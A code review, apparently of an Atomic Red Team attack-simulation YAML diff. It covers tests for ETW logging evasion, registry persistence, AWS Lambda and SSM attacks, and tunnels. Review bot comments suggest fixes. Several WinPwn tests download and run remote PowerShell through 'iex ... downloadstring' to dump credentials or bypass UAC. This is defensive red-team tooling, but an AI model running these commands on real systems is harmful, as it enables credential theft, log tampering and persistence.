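Review bot: dropping the unused `$S3cur3Th1sSh1t_repo` assignment is safe because the `downloadstring(...)` call carries the full literal URL. Since the script is still executed straight from the network via `iex`, the commit SHA `121dcee26a7aca368821563cbe92b2b5638c5773` in that URL is the only thing that keeps the test reproducible, so keep it pinned rather than moving to a branch reference. The same removal recurs in the later WinPwn hunks of this diff.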
@@ -22804,6 +23052,81 @@ defense-evasion:
'
name: powershell
elevation_required: true
- name: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
auto_generated_guid: 653c6e17-14a2-4849-851d-f1c0cc8ea9ab
description: This atomic simulates an activity where an attacker disables the
EventLog-Application ETW Auto Logger session using the reg.exe utility to
update the Windows registry value "Start". This would effectivly disable the
Event log application channel. The changes would only take effect after a
restart.
supported_platforms:
- windows
executor:
command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
/v "Start" /t REG_DWORD /d "0" /f
cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
/v "Start" /t REG_DWORD /d "1" /f
name: command_prompt
elevation_required: true
- name: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
auto_generated_guid: da86f239-9bd3-4e85-92ed-4a94ef111a1c
description: This atomic simulates an activity where an attacker disables the
EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty"
cmdlet to update the Windows registry value "Start". This would effectivly
disable the Event log application channel. The changes would only take effect
after a restart.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
-Name Start -Value 0 -PropertyType "DWord" -Force
cleanup_command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
-Name Start -Value 1 -PropertyType "DWord" -Force
name: powershell
elevation_required: true
- name: Disable EventLog-Application ETW Provider Via Registry - Cmd
auto_generated_guid: 1cac9b54-810e-495c-8aac-989e0076583b
description: This atomic simulates an activity where an attacker disables a
specific ETW provider from the EventLog-Application ETW Auto Logger session
using the reg.exe utility to update the Windows registry value "Enabled".
This would effectivly remove that provider from the session and cause to not
emit any logs of that type. The changes would only take effect after a restart.
supported_platforms:
- windows
input_arguments:
ETWProviderGUID:
type: string
default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
description: Microsoft-Windows-SenseIR ETW Provider GUID
executor:
command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
/v "Enabled" /t REG_DWORD /d "0" /f
cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
/v "Enabled" /t REG_DWORD /d "1" /f
name: command_prompt
elevation_required: true
- name: Disable EventLog-Application ETW Provider Via Registry - PowerShell
auto_generated_guid: 8f907648-1ebf-4276-b0f0-e2678ca474f0
description: This atomic simulates an activity where an attacker disables a
specific ETW provider from the EventLog-Application ETW Auto Logger session
using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry
value "Enabled". This would effectivly remove that provider from the session
and cause to not emit any logs of that type. The changes would only take effect
after a restart.
supported_platforms:
- windows
input_arguments:
ETWProviderGUID:
type: string
default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
description: Microsoft-Windows-SenseIR ETW Provider GUID
executor:
command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
-Name Enabled -Value 0 -PropertyType "DWord" -Force
cleanup_command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
-Name Enabled -Value 1 -PropertyType "DWord" -Force
name: powershell
elevation_required: true
T1601:
technique:
x_mitre_platforms:
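Review bot: in the two `ETW Provider` tests, `reg add ...\#{ETWProviderGUID}` creates the provider subkey when it does not already exist, and the cleanup only writes `Enabled` back to 1, so a host where that provider was not part of the session ends up with a new subkey that was never there. Check for the key before the test (or delete it in cleanup when the test created it) so the Autologger configuration returns to its original state. Also fix `effectivly` (four occurrences) and `cause to not emit any logs of that type` (read `cause it to stop emitting logs of that type`) in the descriptions.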
@@ -26758,11 +27081,11 @@ defense-evasion:
username:
description: Azure username
type: string
default:
default:
password:
description: Azure password
type: string
default:
default:
event_hub_name:
description: Name of the eventhub
type: string
@@ -26770,11 +27093,11 @@ defense-evasion:
resource_group:
description: Name of the resource group
type: string
default:
default:
name_space_name:
description: Name of the NameSpace
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'Install-Module -Name Az
@@ -26837,11 +27160,11 @@ defense-evasion:
username:
description: office-365 username
type: string
default:
default:
password:
description: office-365 password
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
@@ -27092,7 +27415,7 @@ defense-evasion:
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
cleanup_command:
cleanup_command:
name: sh
elevation_required: false
- name: AWS CloudWatch Log Stream Deletes
@@ -27137,7 +27460,7 @@ defense-evasion:
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
cleanup_command:
cleanup_command:
name: sh
elevation_required: false
- name: Office 365 - Set Audit Bypass For a Mailbox
@@ -32203,7 +32526,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
@@ -32215,7 +32537,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
@@ -34766,7 +35087,6 @@ privilege-escalation:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
name: powershell
@@ -34777,7 +35097,6 @@ privilege-escalation:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
name: powershell
@@ -34788,7 +35107,6 @@ privilege-escalation:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
name: powershell
@@ -38694,47 +39012,6 @@ privilege-escalation:
sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
sudo rm /Library/LaunchDaemons/#{plist_filename}
sudo rm /tmp/T1543_004_atomicredteam.txt
- name: Launch Daemon - Users Directory
auto_generated_guid: 6f899f9d-8a8e-4143-89a5-26fc2c3ec438
description: 'Utilize LaunchDaemon in /Users directory to touch temporary file
in /tmp
'
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.T1543.004.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist"
dependency_executor_name: bash
dependencies:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
'
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
'
executor:
name: bash
elevation_required: true
command: |
sudo cp #{path_malicious_plist} ~/Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchDaemons/#{plist_filename}
cleanup_command: |-
sudo launchctl unload ~/Library/LaunchDaemons/#{plist_filename}
sudo rm ~/Library/LaunchDaemons/#{plist_filename}
sudo rm /tmp/T1543_004_atomicredteam.txt
T1574.008:
technique:
modified: '2024-09-12T15:25:57.059Z'
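Review bot: removing this test is the right call because launchd only scans `/Library/LaunchDaemons` and `/System/Library/LaunchDaemons` at boot; a plist in `~/Library/LaunchDaemons` lives only as long as the explicit `launchctl load -w` and gives no persistence, so the test did not exercise the technique, and its argument text (`cron folder`, `shared library`) was copy-paste leftover. The retired GUID `6f899f9d-8a8e-4143-89a5-26fc2c3ec438` should not be reused for a new test, since detection content may still reference it.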
@@ -43701,11 +43978,11 @@ privilege-escalation:
default: calc
executor:
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
/v StartupPrograms /t REG_SZ /d "#{malicious_app}"
/f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
'
cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
/v StartupPrograms /t REG_SZ /d "rdpclip"
/f /v StartupPrograms /t REG_SZ /d "rdpclip"
name: command_prompt
elevation_required: true
- name: Creating Boot Verification Program Key for application execution during
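Review bot: adding `/f` is the right fix: without it `reg add` asks for overwrite confirmation whenever the value already exists, which is always the case for `rdpwd\StartupPrograms` (stock value `rdpclip`), so both the test and the cleanup hung in non-interactive runs. The cleanup restoring `rdpclip` matches the default on a stock system.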
@@ -43727,6 +44004,21 @@ privilege-escalation:
'
cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram
/f
name: command_prompt
elevation_required: true
- name: Add persistence via Windows Context Menu
auto_generated_guid: de47f4a0-2acb-416d-9a6b-cee584a4c4d1
description: |
This atomic test add persistence taking advantage of the Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).
supported_platforms:
- windows
executor:
command: reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"
/ve /t REG_SZ /d "C:\Windows\System32\calc.exe" /f
cleanup_command: reg delete "HKEY_CLASSES_ROOT\Directory\Background\shell\Size
Modify" /f
name: command_prompt
elevation_required: true
T1098:
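Review bot: the description should say where the write actually lands: a `reg add` to `HKEY_CLASSES_ROOT\Directory\Background\shell\...` is stored under `HKLM\Software\Classes` unless the key already exists under `HKCU\Software\Classes`, which is why `elevation_required: true` is correct and which is the path detection content needs to watch. Also tidy the grammar: `This atomic test adds persistence ...` and `The user has to right-click on the desktop or in the white space of an open folder and choose the new entry (Size Modify).`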
@@ -43916,7 +44208,7 @@ privilege-escalation:
- name: AWS - Create a group and add a user to that group
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
description: 'Adversaries create AWS group, add users to specific to that group
to elevate their privilieges to gain more accesss
to elevate their privileges to gain more accesss
'
supported_platforms:
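Review bot: `privilieges` is fixed but `accesss` on the same line is still misspelled; the sentence could read `Adversaries create an AWS group and add users to it to elevate their privileges and gain more access`.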
@@ -44802,7 +45094,7 @@ privilege-escalation:
prereq_command: 'stat "$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate"
'
get_prereq_command: |-
get_prereq_command: |
cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
terraform init
terraform apply -auto-approve
@@ -50723,7 +51015,6 @@ privilege-escalation:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
@@ -50735,7 +51026,6 @@ privilege-escalation:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
@@ -52930,7 +53220,7 @@ execution:
'
type: url
default:
default:
c2_parent_directory:
description: |
Parent directory where you have the "malicious" file on c2_domain server.
@@ -53628,7 +53918,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -53680,7 +53970,49 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
identifier: T1059.010
atomic_tests:
- name: AutoHotKey script execution
auto_generated_guid: 7b5d350e-f758-43cc-a761-8e3f6b052a03
description: 'An adversary may attempt to execute malicious script using AutoHotKey
software instead of regular terminal like powershell or cmd. A messagebox
will be displayed and calculator will popup when the script is executed successfully
'
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'AutoHotKey executable file must exist on disk at the specified
location (#{autohotkey_path})
'
prereq_command: |
if(Test-Path "#{autohotkey_path}") {
exit 0
} else {
exit 1
}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$AutoHotKeyURL = "https://www.autohotkey.com/download/ahk.zip"
$InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads"
Invoke-WebRequest -Uri $AutoHotKeyURL -OutFile $InstallerPath\ahk.zip
Expand-Archive -Path $InstallerPath -Force;
input_arguments:
script_path:
description: AutoHotKey Script Path
type: path
default: PathToAtomicsFolder\T1059.010\src\calc.ahk
autohotkey_path:
description: AutoHotKey Executable File Path
type: path
default: "$PathToAtomicsFolder\\..\\ExternalPayloads\\ahk\\AutoHotKeyU64.exe"
executor:
command: 'Start-Process -FilePath "#{autohotkey_path}" -ArgumentList "#{script_path}"
'
name: powershell
T1059.009:
technique:
modified: '2024-10-15T15:44:20.143Z'
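Review bot: `Expand-Archive -Path $InstallerPath -Force` passes the `ExternalPayloads` directory rather than the archive, so it fails, and even given the archive it would extract into the current directory (no `-DestinationPath`), never producing the `autohotkey_path` default of `...\ExternalPayloads\ahk\AutoHotKeyU64.exe`. Use `Expand-Archive -Path "$InstallerPath\ahk.zip" -DestinationPath "$InstallerPath\ahk" -Force`, and quote the `-OutFile` argument as `"$InstallerPath\ahk.zip"` so paths containing spaces survive.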
@@ -55846,7 +56178,7 @@ execution:
- linux
executor:
command: busybox sh &
cleanup_command:
cleanup_command:
name: sh
elevation_required: false
- name: emacs spawning an interactive system shell
@@ -56861,7 +57193,72 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
identifier: T1651
atomic_tests:
- name: AWS Run Command (and Control)
auto_generated_guid: a3cc9c95-c160-4b86-af6f-84fba87bfd30
description: 'This test simulates an adversary using the AWS Run Command service
to execute commands on EC2 instances.
'
supported_platforms:
- iaas:aws
input_arguments:
access_key:
description: AWS Access Key
type: string
default: ''
secret_key:
description: AWS Secret Key
type: string
default: ''
session_token:
description: AWS Session Token
type: string
default: ''
profile:
description: AWS profile
type: string
default: ''
region:
description: AWS region to deploy the EC2 instance
type: string
default: us-east-2
dependency_executor_name: powershell
dependencies:
- description: 'The AWS PowerShell module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
'
- description: 'Terraform must be installed.
'
prereq_command: 'terraform --version
'
get_prereq_command: 'Write-Host "Terraform is required. Download it from https://www.terraform.io/downloads.html"
'
executor:
command: |
Import-Module "PathToAtomicsFolder/T1651/src/T1651-1/AWSSSMAttack.ps1" -Force
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$region = "#{region}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
Invoke-Terraform -TerraformCommand init -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1"
Invoke-Terraform -TerraformCommand apply -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1" -TerraformVariables @("profile=T1651-1", "region=$region")
Invoke-SSMAttack -AWSProfile "T1651-1" -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1"
Invoke-Terraform -TerraformCommand destroy -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1" -TerraformVariables @("profile=T1651-1", "region=$region")
name: powershell
T1059.005:
technique:
modified: '2024-10-15T16:43:27.104Z'
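Review bot: the `terraform destroy` step sits at the end of the executor `command`, so if `Invoke-SSMAttack` (or the apply) throws, the EC2 instance created by the apply is left running and billed. Move the destroy into a `cleanup_command`, as the T1648 test later in this diff does, so the runner tears it down even after a failed execution.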
@@ -57139,7 +57536,81 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
identifier: T1648
atomic_tests:
- name: Lambda Function Hijack
auto_generated_guid: 87a4a141-c2bb-49d1-a604-8679082d8b91
description: 'Modify an existing Lambda function to execute arbitrary code.
'
supported_platforms:
- iaas:aws
input_arguments:
access_key:
description: AWS Access Key
type: string
default: ''
secret_key:
description: AWS Secret Key
type: string
default: ''
session_token:
description: AWS Session Token
type: string
default: ''
profile:
description: AWS profile
type: string
default: ''
region:
description: AWS region to deploy the EC2 instance
type: string
default: us-east-2
dependency_executor_name: powershell
dependencies:
- description: 'The AWS PowerShell module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
'
- description: 'Terraform must be installed.
'
prereq_command: 'terraform --version
'
get_prereq_command: 'Write-Host "Terraform is required. Download it from https://www.terraform.io/downloads.html"
'
executor:
command: |
Import-Module "PathToAtomicsFolder/T1648/src/T1648-1/LambdaAttack.ps1" -Force
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$region = "#{region}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
Invoke-Terraform -TerraformCommand init -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1"
Invoke-Terraform -TerraformCommand apply -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1" -TerraformVariables @("profile=T1648-1", "region=$region")
Invoke-LambdaAttack -AWSProfile "T1648-1" -AWSRegion $region
cleanup_command: |
Import-Module "PathToAtomicsFolder/T1648/src/T1648-1/LambdaAttack.ps1" -Force
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$region = "#{region}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
Invoke-Terraform -TerraformCommand destroy -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1" -TerraformVariables @("profile=T1648-1", "region=$region")
Remove-MaliciousUser -AWSProfile "T1648-1"
Remove-TFFiles -Path "PathToAtomicsFolder/T1648/src/T1648-1/"
name: powershell
T1204.001:
technique:
modified: '2024-09-10T16:40:03.786Z'
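Review bot: the `region` argument description `AWS region to deploy the EC2 instance` is copied from the Run Command test; this test deploys a Lambda function, so say so. The one-line description `Modify an existing Lambda function to execute arbitrary code.` should also state what the Terraform apply creates (the target function and the user that `Remove-MaliciousUser` later deletes) so a reviewer can judge the blast radius before running it in an account.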
@@ -62092,7 +62563,7 @@ persistence:
$chromium = "https://commondatastorage.googleapis.com/chromium-browser-snapshots/Win_x64/1153778/chrome-win.zip"
# uBlock Origin Lite to test side-loading
$extension = "https://github.com/gorhill/uBlock/releases/download/uBOLite_0.1.23.6055/uBOLite_0.1.23.6055.chromium.mv3.zip"
$extension = "https://github.com/uBlockOrigin/uBOL-home/releases/download/uBOLite_2024.11.25.1376/uBOLite_2024.11.25.1376.chromium.mv3.zip"
Set-Location "#{working_dir}"
@@ -63165,47 +63636,6 @@ persistence:
sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
sudo rm /Library/LaunchDaemons/#{plist_filename}
sudo rm /tmp/T1543_004_atomicredteam.txt
- name: Launch Daemon - Users Directory
auto_generated_guid: 6f899f9d-8a8e-4143-89a5-26fc2c3ec438
description: 'Utilize LaunchDaemon in /Users directory to touch temporary file
in /tmp
'
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.T1543.004.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist"
dependency_executor_name: bash
dependencies:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
'
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
'
executor:
name: bash
elevation_required: true
command: |
sudo cp #{path_malicious_plist} ~/Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchDaemons/#{plist_filename}
cleanup_command: |-
sudo launchctl unload ~/Library/LaunchDaemons/#{plist_filename}
sudo rm ~/Library/LaunchDaemons/#{plist_filename}
sudo rm /tmp/T1543_004_atomicredteam.txt
T1574.008:
technique:
modified: '2024-09-12T15:25:57.059Z'
@@ -67594,11 +68024,11 @@ persistence:
default: calc
executor:
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
/v StartupPrograms /t REG_SZ /d "#{malicious_app}"
/f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
'
cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
/v StartupPrograms /t REG_SZ /d "rdpclip"
/f /v StartupPrograms /t REG_SZ /d "rdpclip"
name: command_prompt
elevation_required: true
- name: Creating Boot Verification Program Key for application execution during
@@ -67620,6 +68050,21 @@ persistence:
'
cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram
/f
name: command_prompt
elevation_required: true
- name: Add persistence via Windows Context Menu
auto_generated_guid: de47f4a0-2acb-416d-9a6b-cee584a4c4d1
description: |
This atomic test add persistence taking advantage of the Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).
supported_platforms:
- windows
executor:
command: reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"
/ve /t REG_SZ /d "C:\Windows\System32\calc.exe" /f
cleanup_command: reg delete "HKEY_CLASSES_ROOT\Directory\Background\shell\Size
Modify" /f
name: command_prompt
elevation_required: true
T1136.003:
@@ -67828,7 +68273,7 @@ persistence:
= \"#{username}\" \n$password = \"#{password}\"\naz ad user create
--display-name $username --password $password --user-principal-name $userprincipalname\naz
ad user list --filter \"displayname eq 'atomicredteam'\" "
cleanup_command: az ad user delete --id
cleanup_command: az ad user delete --id "#{userprincipalname}"
name: powershell
T1098:
technique:
@@ -68017,7 +68462,7 @@ persistence:
- name: AWS - Create a group and add a user to that group
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
description: 'Adversaries create AWS group, add users to specific to that group
to elevate their privilieges to gain more accesss
to elevate their privileges to gain more accesss
'
supported_platforms:
@@ -68903,7 +69348,7 @@ persistence:
prereq_command: 'stat "$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate"
'
get_prereq_command: |-
get_prereq_command: |
cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
terraform init
terraform apply -auto-approve
@@ -74987,7 +75432,6 @@ persistence:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
@@ -74999,7 +75443,6 @@ persistence:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
@@ -76480,7 +76923,7 @@ command-and-control:
MSP360_Download_Url:
description: URL to download MSP360 Connect from
type: url
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'MSP360 must exist at (#{MSP360_Connect_Path})
@@ -76584,6 +77027,17 @@ command-and-control:
Remote\Server\#{srserver_exe}"
name: powershell
elevation_required: true
- name: Microsoft App Quick Assist Execution
auto_generated_guid: 1aea6d15-70f1-4b4e-8b02-397b5d5ffe75
description: "An adversary may attempt to trick a user into executing Microsoft
Quick Assist Microsoft Store app and connect to the user's machine. \n"
supported_platforms:
- windows
executor:
command: Start-Process "shell:AppsFolder\MicrosoftCorporationII.QuickAssist_8wekyb3d8bbwe!App"
cleanup_command: Stop-Process -Name quickassist
name: powershell
elevation_required: true
T1659:
technique:
modified: '2023-10-01T02:28:45.147Z'
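Review bot: `elevation_required: true` looks unnecessary for `Start-Process "shell:AppsFolder\MicrosoftCorporationII.QuickAssist_8wekyb3d8bbwe!App"`, which launches a Store app in the calling user's context; running it elevated also makes the launch look different from the user-tricked scenario the description gives. `Stop-Process -Name quickassist` should carry `-ErrorAction Ignore` like the other cleanups in this file, since the user may already have closed the app.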
@@ -76959,6 +77413,124 @@ command-and-control:
Remove-Item C:\%userprofile%\AppData\Local\ngrok -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Microsoft Dev tunnels (Linux/macOS)
auto_generated_guid: 9f94a112-1ce2-464d-a63b-83c1f465f801
description: |
Dev Tunnels enables insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels.
This atomic will generate a dev tunnel binding it to the local service running on the provided port. Can be used to expose local services, web applications and local files etc.
Reference:
- [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
supported_platforms:
- linux
- macos
input_arguments:
port:
description: port number for tunnel
type: integer
default: 8080
download_url:
description: link to download devtunnel
type: string
default: https://aka.ms/TunnelsCliDownload/linux-x64
binary_path:
description: path to download devtunnel
type: string
default: PathToAtomicsFolder/../ExternalPayloads/devtunnel
dependencies:
- description: 'Download devtunnel
'
prereq_command: 'test -f #{binary_path}
'
get_prereq_command: |
mkdir -p $(dirname #{binary_path})
curl -L "#{download_url}" -o "#{binary_path}"
chmod +x #{binary_path}
- description: 'Login to Microsoft Dev tunnels
'
prereq_command: '#{binary_path} user show | grep -q "Not logged in" && exit
1 || exit 0
'
get_prereq_command: 'echo "Login to devtunnel using the following command:
#{binary_path} user login"
'
executor:
command: "#{binary_path} host -p #{port} &\n"
cleanup_command: |
pkill -9 $(basename "#{binary_path}")
#{binary_path} user logout
rm #{binary_path}
name: bash
- name: VSCode tunnels (Linux/macOS)
auto_generated_guid: b877943f-0377-44f4-8477-f79db7f07c4d
description: |
Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet.
This atomic will generate a dev tunnel binding it to the local service running on the provided port.
Reference:
- [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
supported_platforms:
- linux
- macos
input_arguments:
artifact_base_url:
description: Base URL to download code-cli
type: string
default: https://code.visualstudio.com/sha/download
artifact_build:
description: build to download - Allowed values (stable/insiders)
type: string
default: stable
payload_path:
description: path to download code-cli
type: string
default: PathToAtomicsFolder/../ExternalPayloads
additional_args:
description: additional arguments to pass to code tunnel
type: string
default: ''
dependencies:
- description: 'Install code-cli
'
prereq_command: 'which code
'
get_prereq_command: "ARCH_SUFFIX=$(uname -m | grep -q \"arm64\\|aarch64\"
&& echo \"arm64\" || echo \"x64\")\nif [ \"$(uname)\" = \"Darwin\" ]\nthen
